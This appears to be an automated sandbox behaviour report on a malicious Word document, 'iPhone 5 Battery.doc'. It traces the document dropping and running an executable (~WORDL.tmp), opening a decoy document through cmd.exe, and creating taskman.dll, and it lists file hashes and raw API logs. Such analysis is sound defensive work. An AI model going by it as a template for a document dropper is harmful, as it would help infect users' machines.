6.0.2600.6028!ScrollBar SCROLLBAR 90152 success 1 30054A32 CreateWindowExA
_WwC _WwC 700FC success 1 30054A32 CreateWindowExA
_WwC _WwC 60112 success 1 30054A32 CreateWindowExA
Window name Class name HWND of window Completion Count Source Address Symbol
NULL MSOBALLOON 0 error 1 30063D12 FindWindowA
NULL MsoHelp10 0 error 1 30063D27 FindWindowA
NULL AgentAnim 0 error 1 30063D40 FindWindowA
HWND Completion Count Source Address Symbol
Desktop HWND Parent HWND Enum Childrens TID Window Handles Completion Count Source Address Symbol
HWND Completion Count Source Address Symbol
1008C success 1 300037BB NtUserGetForegroundWindow
5012E success 9 30063CEF NtUserGetForegroundWindow
HWND Command Completion Count Source Address Symbol
40134 show normal error 1 3005545D NtUserShowWindow
5012E show maximized error 1 3002CCA5 NtUserShowWindow
40134 show normal success 5 3005545D NtUserShowWindow
400EC show normal error 1 300747CC NtUserShowWindow
400E4 show normal error 1 300747CC NtUserShowWindow
400DE show normal error 1 300747CC NtUserShowWindow
40128 show normal error 1 300747CC NtUserShowWindow
500DC show normal error 1 300747CC NtUserShowWindow
400D6 show normal error 1 300747CC NtUserShowWindow
400EC show normal success 3 300747CC NtUserShowWindow
400E4 show normal success 3 300747CC NtUserShowWindow
400DE show normal success 3 300747CC NtUserShowWindow
40128 show normal success 3 300747CC NtUserShowWindow
500DC show normal success 3 300747CC NtUserShowWindow
400D6 show normal success 3 300747CC NtUserShowWindow
5012C show normal error 1 3006A9F5 NtUserShowWindow
50106 show normal error 1 30074BAC NtUserShowWindow
500DC show success 1 30074BC1 NtUserShowWindow
400D6 show success 1 30074BD6 NtUserShowWindow
900FE show normal error 1 300747CC NtUserShowWindow
90152 show normal error 1 300747CC NtUserShowWindow
9013E show normal error 1 300747CC NtUserShowWindow
500F8 show normal error 1 300747CC NtUserShowWindow
60112 show normal error 1 300747CC NtUserShowWindow
900FE show normal success 2 300747CC NtUserShowWindow
90152 show normal success 2 300747CC NtUserShowWindow
9013E show normal success 2 300747CC NtUserShowWindow
500F8 show normal success 2 300747CC NtUserShowWindow
60112 show normal success 2 300747CC NtUserShowWindow
50124 show normal error 1 30074BAC NtUserShowWindow
60112 show success 1 30074BC1 NtUserShowWindow
400D8 show normal error 1 3005545D NtUserShowWindow
400F2 hide error 1 30294A11 NtUserShowWindow
90058 hide success 1 3024E018 NtUserShowWindow
90058 show error 1 30250866 NtUserShowWindow
HWND Command Completion Count Source Address Symbol
5012E show maximized success 2 3006ADB8 NtUserGetWindowPlacement
HWND Message LParam WParam Completion Count Source Address Symbol
5012E 45F 0 0 success 1 30003B2E PostMessageA
50136 DDE_ACK 524352 55447496 success 1 3067D00E PostMessageA
50136 DDE_ACK 524352 3221864481 success 1 3067B376 SendMessageA
TID Message LParam WParam Completion Count Source Address Symbol
Module Thread id Hook code Completion Count Source Address Symbol
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE 1768 FFFFFFFF success 1 30007EF6 SetWindowsHookExW

Process Token Activities

Status Privilege Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Memory attributes changed PID: 1160 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Base: 30B81000 Length: 1000 New Protection: page readonly New Protection: page read and write success or wait 614924961
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion Name: CommonFilesDir success or wait 614925676
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: write and read and execute Type: commit Baseaddress: 860000 Size: 12259328 Protection: execute Mapped to pid: own pid success or wait 614927266
Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL Access: query and write and read and execute Type: image Baseaddress: 30C90000 Size: 12304384 Protection: read write Mapped to pid: own pid success or wait 614929938
Section loaded Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: unknown Baseaddress: 870000 Size: 57344 Protection: read write Mapped to pid: own pid success or wait 614969924
Foreground Window Got HWND: 1008C success 615140927
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615180950
Process information queried PID: 1160 Info Class: VmCounters success or wait 615181155
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615221478
Process information queried PID: 1160 Info Class: VmCounters success or wait 615221691
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: A30000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 615276389
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 615280109
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 615284542
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: A30000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 615293274
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 615296119
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: A30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 615298353
Window created Window Name: OpusApp Class Name: OpusApp HWND: 5012E success 615334574
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: read Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 615387927
Section loaded Path: \BaseNamedObjects\PrimaryWord11SharedMemoryArea Access: query and write and read Type: commit Baseaddress: A90000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 615388162
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615403324
Process information queried PID: 1160 Info Class: VmCounters success or wait 615403527
Windows hook set Module: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE TID: 1768 Hook ID: FFFFFFFF success 615503530
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615682534
Process information queried PID: 1160 Info Class: VmCounters success or wait 615682754
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 615704360
Process information queried PID: 1160 Info Class: VmCounters success or wait 615704571
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot Offset: unknown Length: 54 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 615715203
File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Templates\~$Normal.dot Offset: unknown Length: 108 Value: 00 00 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 48 00 00 00 00 00 3E 00 02 02 00 00 06 00 09 00 34 00 00 00 00 00 90 00 90 00 00 00 00 00 0F 00 00 00 FF FF FF 00 00 00 00 00 00 00 14 00 14 00 00 00 00 00 00 00 02 63 78 00 C8 00 00 00 00 00 14 00 00 00 00 00 90 00 90 00 80 00 16 00 00 00 success or wait 615716383
File created Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word Access: read data or list directory and synchronize Options: directory file and synchronous io non alert and open for backup ident Attributes: normal Content Overwritten: null success or wait 615744728
File other op Path: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.Word New path: Disposition: BasicInformation Data : Creation Time: 01:00 01-01-1601 Last Access Time: 01:00 01-01-1601 Last Write Time: 01:00 01-01-1601 Change Time: 01:00 01-01-1601 File Attributes: hidden and archive and temporary and sparse file success or wait 615748785
Window created Window Name: _WwC Class Name: _WwC HWND: 40134 success 615761522
Window shown HWND: 40134 CMD: show normal error 615762195
Window created Window Name: _WwF Class Name: _WwF HWND: 90058 success 616180241
Window shown HWND: 5012E CMD: show maximized error 616203283
Foreground Window Got HWND: 5012E success 616242077
Windows found Window Name: NULL Class Name: MSOBALLOON HWND: 0 error 616242285
Windows found Window Name: NULL Class Name: MsoHelp10 HWND: 0 error 616242498
Windows found Window Name: NULL Class Name: AgentAnim HWND: 0 error 616242706
Foreground Window Got HWND: 5012E success 616308358
Foreground Window Got HWND: 5012E success 616325024
Foreground Window Got HWND: 5012E success 616351306
Window shown HWND: 40134 CMD: show normal success 616446590
Window shown HWND: 40134 CMD: show normal success 616455795
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 616491092
Process information queried PID: 1160 Info Class: VmCounters success or wait 616491291
Message posted HWND: 5012E Message: 45F WParam: 0 LParam: 0 success 619554796
Foreground Window Got HWND: 5012E success 619555353
Window created Window Name: _WwB Class Name: _WwB HWND: 80040 success 619573385
Message sent HWND: 50136 Message: DDE_ACK WParam: 524352 LParam: 3221864481 success 619574288
Foreground Window Got HWND: 5012E success 619793558
Foreground Window Got HWND: 5012E success 619793750
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 619974629
Process information queried PID: 1160 Info Class: VmCounters success or wait 619974841
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 619990816
Process information queried PID: 1160 Info Class: VmCounters success or wait 619991028
File write Path: C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc Offset: unknown Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 619999738
File write Path: C:\Documents and Settings\Administrator\Desktop\~$hone 5 Battery.doc Offset: unknown Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 1E 00 00 00 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 40 00 08 00 36 01 05 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1A 00 00 00 success or wait 620000901
Window placement got HWND: 5012E CMD: show maximized success 626539024
Window created Window Name: _WwB Class Name: _WwB HWND: 5012C success 626541312
Foreground Window Got HWND: 5012E success 626557465
Window created Window Name: _WwG Class Name: _WwG HWND: 50106 success 626558602
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 400EC success 626561968
Window created Window Name: _WwC Class Name: _WwC HWND: 40120 success 626563378
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 400E4 success 626592832
Window created Window Name: _WwC Class Name: _WwC HWND: 400DA success 626616986
Window created Window Name: _WwC Class Name: _WwC HWND: 500DC success 626617515
Window created Window Name: _WwC Class Name: _WwC HWND: 400D6 success 626618331
Window shown HWND: 400EC CMD: show normal error 626644839
Window shown HWND: 400E4 CMD: show normal error 626645010
Window shown HWND: 400DE CMD: show normal error 626645173
Window shown HWND: 40128 CMD: show normal error 626645728
Window shown HWND: 500DC CMD: show normal error 626646364
Window shown HWND: 400D6 CMD: show normal error 626646527
Window shown HWND: 400EC CMD: show normal success 626659203
Window shown HWND: 400E4 CMD: show normal success 626659362
Window shown HWND: 400DE CMD: show normal success 626659518
Window shown HWND: 40128 CMD: show normal success 626660319
Window shown HWND: 500DC CMD: show normal success 626660835
Window shown HWND: 400D6 CMD: show normal success 626660991
Window shown HWND: 400EC CMD: show normal success 626662701
Window shown HWND: 400E4 CMD: show normal success 626662856
Window shown HWND: 400DE CMD: show normal success 626663012
Window shown HWND: 40128 CMD: show normal success 626663392
Window shown HWND: 500DC CMD: show normal success 626663731
Window shown HWND: 400D6 CMD: show normal success 626663887
Window shown HWND: 40134 CMD: show normal success 626664059
Window shown HWND: 5012C CMD: show normal error 626664216
Window shown HWND: 50106 CMD: show normal error 626673791
Window shown HWND: 500DC CMD: show success 626674518
Window shown HWND: 400D6 CMD: show success 626674676
Window shown HWND: 40134 CMD: show normal success 626675495
Window shown HWND: 400EC CMD: show normal success 626675652
Window shown HWND: 400E4 CMD: show normal success 626677700
Window shown HWND: 400DE CMD: show normal success 626679047
Window shown HWND: 40128 CMD: show normal success 626679898
Window shown HWND: 500DC CMD: show normal success 626680515
Window shown HWND: 400D6 CMD: show normal success 626680671
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA Name: Vbe6DllPath success or wait 627146312
Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL Access: write and read and execute Type: commit Baseaddress: 28E0000 Size: 2588672 Protection: execute Mapped to pid: own pid success or wait 627148197
Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\VBA\VBA6\VBE6.DLL Access: query and write and read and execute Type: image Baseaddress: 65000000 Size: 2588672 Protection: read write Mapped to pid: own pid success or wait 627150840
Window placement got HWND: 5012E CMD: show maximized success 627266739
Window created Window Name: OpusApp Class Name: OpusApp HWND: 9014E success 627267020
Section loaded Path: \KnownDlls\MSIMG32.dll Access: write and read and execute Type: unknown Baseaddress: unknown Size: unknown Protection: unknown Mapped to pid: unknown object name not found 627303167
Section loaded Path: C:\WINDOWS\system32\msimg32.dll Access: query and write and read and execute Type: image Baseaddress: 76380000 Size: 20480 Protection: read write Mapped to pid: own pid success or wait 627307144
Window created Window Name: _WwC Class Name: _WwC HWND: 400D8 success 627324436
Window created Window Name: _WwF Class Name: _WwF HWND: 7013C success 627324986
Window created Window Name: _WwB Class Name: _WwB HWND: 400F2 success 627328828
Window created Window Name: _WwG Class Name: _WwG HWND: 50124 success 627330095
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 900FE success 627333481
Window created Window Name: _WwC Class Name: _WwC HWND: 400EA success 627334233
Window created Window Name: 6.0.2600.6028!ScrollBar Class Name: SCROLLBAR HWND: 90152 success 627361306
Window created Window Name: _WwC Class Name: _WwC HWND: 700FC success 627388434
Window created Window Name: _WwC Class Name: _WwC HWND: 60112 success 627388949
Window shown HWND: 900FE CMD: show normal error 627392790
Window shown HWND: 90152 CMD: show normal error 627392958
Window shown HWND: 9013E CMD: show normal error 627393118
Window shown HWND: 500F8 CMD: show normal error 627394081
Window shown HWND: 60112 CMD: show normal error 627394744
Window shown HWND: 900FE CMD: show normal success 627397726
Window shown HWND: 90152 CMD: show normal success 627397881
Window shown HWND: 9013E CMD: show normal success 627398034
Window shown HWND: 500F8 CMD: show normal success 627398420
Window shown HWND: 60112 CMD: show normal success 627398764
Window shown HWND: 40134 CMD: show normal success 627398942
Window shown HWND: 50124 CMD: show normal error 627399172
Window shown HWND: 60112 CMD: show success 627399338
Window shown HWND: 400D8 CMD: show normal error 627401081
Window shown HWND: 900FE CMD: show normal success 627401251
Window shown HWND: 90152 CMD: show normal success 627401408
Window shown HWND: 9013E CMD: show normal success 627401563
Window shown HWND: 500F8 CMD: show normal success 627401982
Window shown HWND: 60112 CMD: show normal success 627402370
Window shown HWND: 400F2 CMD: hide error 627402550
Process information queried PID: 1160 Info Class: QuotaLimits success or wait 627414422
Process information queried PID: 1160 Info Class: VmCounters success or wait 627414628
Window shown HWND: 90058 CMD: hide success 627801189
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\~WRD0002.doc Offset: unknown Length: 581 Value: FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 634989114
Window shown HWND: 90058 CMD: show error 635066230
Message posted HWND: 50136 Message: DDE_ACK WParam: 524352 LParam: 55447496 success 635130760
Foreground Window Got HWND: 5012E success 635599049
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 669475883
File read Path: C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc Offset: unknown Length: 90112 Value: C9 DF 16 87 9B 99 9A 9B 98 9D 9E 9F 6F 6E 92 93 2C 95 96 97 E8 E9 EA EB AC ED EE EF E0 E1 E2 E3 E4 E5 E6 E7 F8 F9 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 CA CB CC CD CE CF 38 C1 C2 C3 CA DA 7C C9 D8 6D D3 16 FD 65 DF 93 1D F0 86 BB BD A6 F6 A7 5A 46 4D 59 4D 40 0E 4C 41 4F 4C 4C 50 05 44 42 success or wait 669487744
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Offset: unknown Length: 90112 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 669610398
Process created PID: 1112 Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Cmdline: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp Createflags: none success or wait 670178841
File created Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 671090526
File read Path: C:\Documents and Settings\Administrator\Desktop\iPhone 5 Battery.doc Offset: unknown Length: 21504 Value: 32 2C F5 05 47 56 E2 18 FA FB FC FD FE FF F0 F1 F2 F3 F4 F5 F6 F7 C8 C9 F4 CB CF CD 30 30 C9 C1 C4 C3 C4 C5 C6 C7 D8 D9 DA DB DC DD DF DF D0 D1 F7 D3 D4 D5 D6 D7 28 29 2A 3B 2C 2D 09 2F 20 21 23 23 24 25 D8 D8 C7 C6 3A 3B 3C 3D 1A 3F 30 31 CD CC CB CA C9 C8 F7 F6 F5 F4 F3 F2 F1 F0 FF FE FD FC FB FA success or wait 671097579
File write Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\iPhone 5.doc Offset: unknown Length: 21504 Value: D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3E 00 03 00 FE FF 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 25 00 00 00 00 00 00 00 00 10 00 00 27 00 00 00 01 00 00 00 FE FF FF FF 00 00 00 00 24 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF FF success or wait 671126430
Process created PID: 1096 Path: C:\WINDOWS\system32\cmd.exe Cmdline: cmd.exe /c iPhone 5.doc Createflags: none success or wait 671188387
General
Start time: 15:20:05
Start date: 24/07/2012
Path: C:\WINDOWS\system32\svchost.exe
Wow64 process (32bit): false
Commandline: unknown
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Offset Length Value Completion Count Source Address Symbol
File Path Disposition Data Ascii Data Completion Count Source Address Symbol

Section Activities

File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 630000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 630000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 630000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\wiaservc.dll write and read and execute commit 670000 335872 own pid execute success or wait 1
C:\WINDOWS\system32\wiaservc.dll query and write and read and execute image 75AA0000 348160 own pid read write success or wait 1
\KnownDlls\CFGMGR32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\cfgmgr32.dll query and write and read and execute image 74AE0000 28672 own pid read write success or wait 1
\KnownDlls\setupapi.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\KnownDlls\mscms.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\mscms.dll query and write and read and execute image 73B30000 86016 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\KnownDlls\WINSTA.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winsta.dll query and write and read and execute image 76360000 65536 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 680000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 680000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 680000 2904064 own pid read write conflicting addresses 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\KnownDlls\WINTRUST.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\wintrust.dll query and write and read and execute image 76C30000 188416 own pid read write success or wait 1
\KnownDlls\CRYPT32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\crypt32.dll query and write and read and execute image 77A80000 610304 own pid read write success or wait 1
\KnownDlls\MSASN1.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msasn1.dll query and write and read and execute image 77B20000 73728 own pid read write success or wait 1
\KnownDlls\IMAGEHLP.dll write and read and execute unknown 76C90000 163840 own pid read write success or wait 1
C:\WINDOWS\system32\actxprxy.dll write and read and execute commit B20000 98304 own pid execute success or wait 1
C:\WINDOWS\system32\actxprxy.dll query and write and read and execute image 71D40000 110592 own pid read write success or wait 1
C:\WINDOWS\system32\sti.dll write and read and execute commit B60000 69632 own pid execute success or wait 1
C:\WINDOWS\system32\sti.dll query and write and read and execute image 73BA0000 77824 own pid read write success or wait 1

Registry Activities

Key Path Completion Count Source Address Symbol
Key Path Key Value Name Completion Count Source Address Symbol
Key Path Name Type Data Completion Count Source Address Symbol
Key Path Name Type Old Data New Data Completion Count Source Address Symbol
Key Path Name Completion Count Source Address Symbol

Mutex Activities

Name Completion Count Source Address Symbol

Process Activities

PID Process info class Completion Count Source Address Symbol

Thread Activities

TID PID EIP EAX (Usermode EIP) Filepath Completion Count Source Address Symbol
TID PID Path Completion Count Source Address Symbol
TID Delay Completion Count Source Address Symbol

Memory Activities

PID Filepath Base Length Protection Completion Count Source Address Symbol
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:05 1 3 1
15:20:06 2 4 2
15:20:20 2 3 2
15:20:21 2 3 2
15:20:24 2 3 2
15:20:31 2 3 2
15:20:33 2 2 2
15:20:34 2 2 2
15:20:35 2 1 2
15:20:37 2 1 2
15:20:39 2 1 2
15:20:40 2 1 2
15:20:41 2 1 2
15:20:42 2 1 2
15:21:06 2 1 2

System Activities

System info class Completion Count Source Address Symbol

Timing Activities

Time Completion Count Source Address Symbol

Process Token Activities

Status Privilege Completion Count Source Address Symbol

Object Security Activities

Path Information Class Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
General
Start time: 15:20:20
Start date: 24/07/2012
Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp
Wow64 process (32bit): false
Commandline: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp
Imagebase: 0x400000
File size: 90112 bytes
MD5 hash: 99C47CE55EF67DAEE72E82608E4F62DD

File Activities

File Path Access Options Content overwritten Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\taskman.dll read attributes and synchronize and generic read and generic write sequential only and synchronous io non alert and non directory file true success or wait 1 40155A CreateFileW
C:\WINDOWS\system32\rundll32.exe read attributes and synchronize and generic read sequential only and synchronous io non alert and non directory file true success or wait 1 4015AF CreateFileW
File Path Access Attributes Options Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\taskman.dll read attributes and synchronize and generic read and generic write normal synchronous io non alert and non directory file success or wait 1 401429 CreateFileW
File Path Offset Length Value Completion Count Source Address Symbol
